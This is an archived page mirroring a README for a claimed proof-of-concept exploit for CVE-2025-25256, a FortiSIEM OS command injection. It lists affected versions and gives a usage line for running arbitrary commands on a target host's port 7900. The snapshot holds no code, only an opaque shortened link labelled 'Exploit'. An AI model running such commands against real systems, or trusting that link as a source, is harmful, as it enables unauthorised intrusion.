关联漏洞
标题:Fortinet FortiSIEM 操作系统命令注入漏洞 (CVE-2025-25256)Description:Fortinet FortiSIEM是美国飞塔(Fortinet)公司的一套安全信息和事件管理系统。该系统包括资产发现、工作流程自动化和统一管理等功能。 Fortinet FortiSIEM 7.3.0至7.3.1版本、7.2.0至7.2.5版本、7.1.0至7.1.7版本、7.0.0至7.0.3版本和6.7.9之前版本存在操作系统命令注入漏洞,该漏洞源于OS命令注入,可能导致执行任意代码。
Description
CVE-2025-25256: Fortinet FortiSIEM OS Command Injection PoC
介绍
# CVE-2025-25256: Fortinet FortiSIEM OS Command Injection PoC
## Overview
This repository contains a proof-of-concept exploit for CVE-2025-25256, a critical (CVSS 9.8) unauthenticated OS command injection vulnerability in Fortinet FortiSIEM. The flaw allows remote attackers to execute arbitrary commands via crafted CLI requests to the phMonitor service on port 7900.
## Affected Versions
- FortiSIEM 6.1 to 6.6: All versions
- FortiSIEM 6.7.0 to 6.7.9
- FortiSIEM 7.0.0 to 7.0.3
- FortiSIEM 7.1.0 to 7.1.7
- FortiSIEM 7.2.0 to 7.2.5
- FortiSIEM 7.3.0 to 7.3.1
Upgrade to 7.3.2+ or 7.4.0 as per [Fortinet advisory](https://www.fortiguard.com/psirt/FG-IR-25-152).
## Usage
Run the exploit:
```
python3 cve-2025-25256.py -t <TARGET_IP> -p 7900 -c "<COMMAND>"
```
See the script for more details.
## Disclaimer
This tool is provided for educational and security research purposes only. Use responsibly and only on systems you own or have permission to test.
## Exploit
[href](https://tinyurl.com/y2pwvkun)
Follow me for more vulnerability research.
文件快照
[4.0K] /data/pocs/b2fc334cd011919d30173dfaaff476d46024b944
└── [1.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。